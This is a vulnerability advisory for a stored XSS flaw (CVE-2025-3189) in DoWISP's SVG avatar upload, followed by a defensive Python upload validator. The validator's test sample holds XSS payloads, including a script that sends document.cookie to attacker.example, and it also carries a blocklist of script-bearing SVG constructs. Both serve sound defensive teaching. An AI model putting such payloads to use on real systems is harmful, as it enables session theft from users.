Stored Cross-Site Scripting (XSS) in DoWISP

Posted date 03/04/2025
Identifier
INCIBE-2025-0169
Importance
3 - Medium
Affected Resources

DoWISP, versions prior to 1.16.2.50.

Description

INCIBE has coordinated the publication of a medium severity vulnerability affecting DoWISP, an all-in-one management software for Internet service providers, which was discovered by David Padilla Alvarado.

This vulnerability has been assigned the following code, CVSS v4.0 base score, CVSS vector and vulnerability type CWE:

  • CVE-2025-3189: CVSS v4.0: 4.8 | CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N | CWE-79

Solution

The vulnerability has been fixed by the DoWISP team in version 1.16.2.50.

Detail

CVE-2025-3189: Stored Cross-Site Scripting (XSS) in DoWISP versions prior to 1.16.2.50. The application accepts a profile picture in SVG format without neutralising the JavaScript that an SVG document can carry, so an authenticated user with sufficient privileges can upload an image whose embedded script is stored and later executed in the browser of anyone who opens the image from the application's origin. The CVSS vector reflects this: high privileges are needed to upload (PR:H), a victim must interact with the stored image (UI:P), and the impact is confined to the victim's session rather than the vulnerable component itself (SC:L/SI:L).
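The class of bug described above is a server-side validation gap: an SVG is an XML document that may contain <script> elements, on* event handlers and javascript: links, so treating it as "just an image" is what turns an avatar upload into stored XSS. The following is an added example written for this page, not DoWISP code and not the vendor's fix. It shows a content-based vetting routine for a profile-picture upload path: raster formats are identified by their magic bytes rather than the client-declared type, SVG is rejected by default, and where SVG must be allowed the document is parsed and refused if it carries active content. The function names, the size limit and the two embedded SVG samples are all constructed for the example.

```python
"""Added example (not DoWISP code): vetting a profile-picture upload so that an
SVG with embedded JavaScript cannot become a stored XSS payload.
All names, limits and sample files here are hypothetical."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Constructed sample: an SVG carrying three kinds of active content that a
# browser would execute if it navigated to the file on the application origin.
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     onload="alert(document.cookie)">
  <script>fetch('//attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text y="20">profile</text></a>
</svg>"""

# Constructed sample: a plain vector image with no script-bearing constructs.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>"""

MAX_BYTES = 512 * 1024          # hypothetical upload limit; bounds parser work too
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
GIF_MAGICS = (b"GIF87a", b"GIF89a")

# Headers to send with any stored avatar: no sniffing, no script, no origin.
SAFE_HEADERS = {
    "X-Content-Type-Options": "nosniff",
    "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
}


def sniff_raster(data: bytes) -> Optional[str]:
    """Identify PNG/JPEG/GIF from the leading bytes, ignoring the declared type."""
    if data.startswith(PNG_MAGIC):
        return "image/png"
    if data.startswith(JPEG_MAGIC):
        return "image/jpeg"
    if data.startswith(GIF_MAGICS):
        return "image/gif"
    return None


def looks_like_svg(data: bytes) -> bool:
    """Cheap check for an SVG document (optionally preceded by an XML prolog)."""
    head = data.lstrip()[:512].lower()
    return head.startswith(b"<svg") or (head.startswith(b"<?xml") and b"<svg" in head)


def svg_active_content(data: bytes) -> List[str]:
    """Return the constructs in an SVG that would run script when rendered."""
    findings: List[str] = []
    try:
        # Note: for untrusted input in production, parse with defusedxml to
        # resist entity-expansion attacks; the size cap above is only a stopgap.
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["not well-formed XML"]
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1].lower()          # strip namespace
        if tag in ("script", "foreignobject", "iframe", "embed", "object"):
            findings.append(f"<{tag}> element")
        if tag in ("animate", "set") and el.get("attributeName", "").lower().endswith("href"):
            findings.append(f"<{tag}> animating href")
        for name, value in el.attrib.items():
            lname = name.rsplit("}", 1)[-1].lower()      # "{xlink-ns}href" -> "href"
            if lname.startswith("on"):
                findings.append(f"{lname} event handler")
            if lname == "href":
                # Browsers ignore whitespace/control chars in the scheme, so do we.
                v = re.sub(r"[\s\x00-\x1f]", "", value).lower()
                if v.startswith("javascript:") or (v.startswith("data:") and not v.startswith("data:image/")):
                    findings.append("href with javascript:/data: URL")
    return findings


def vet_profile_picture(data: bytes, declared_type: str, allow_svg: bool = False) -> Dict:
    """Decide whether an upload may be stored, and with what type and headers."""
    if len(data) > MAX_BYTES:
        return {"accept": False, "reason": "file too large"}
    raster = sniff_raster(data)
    if raster:
        if declared_type != raster:
            return {"accept": False, "reason": f"declared {declared_type} but content is {raster}"}
        return {"accept": True, "content_type": raster, "headers": SAFE_HEADERS}
    if looks_like_svg(data):
        if not allow_svg:
            # Safest policy for avatars: raster only, or rasterise server-side.
            return {"accept": False, "reason": "SVG not accepted for profile pictures"}
        problems = svg_active_content(data)
        if problems:
            return {"accept": False, "reason": "active content in SVG: " + "; ".join(problems)}
        return {"accept": True, "content_type": "image/svg+xml", "headers": SAFE_HEADERS}
    return {"accept": False, "reason": "unrecognised image format"}


if __name__ == "__main__":
    print(vet_profile_picture(MALICIOUS_SVG, "image/svg+xml"))
    print(vet_profile_picture(MALICIOUS_SVG, "image/svg+xml", allow_svg=True))
    print(vet_profile_picture(BENIGN_SVG, "image/svg+xml", allow_svg=True))
```

Two design points are worth keeping in mind when adapting this. First, the element and attribute blocklist in svg_active_content is illustrative; an allowlist of known-safe SVG elements and attributes (as sanitiser libraries implement) is the more robust choice if SVG must be supported. Second, even a clean SVG should be served from a separate origin or with the sandboxing CSP shown, because an <img> tag never executes script but a direct navigation to the file URL on the application's origin does, which is exactly the path a stored payload relies on.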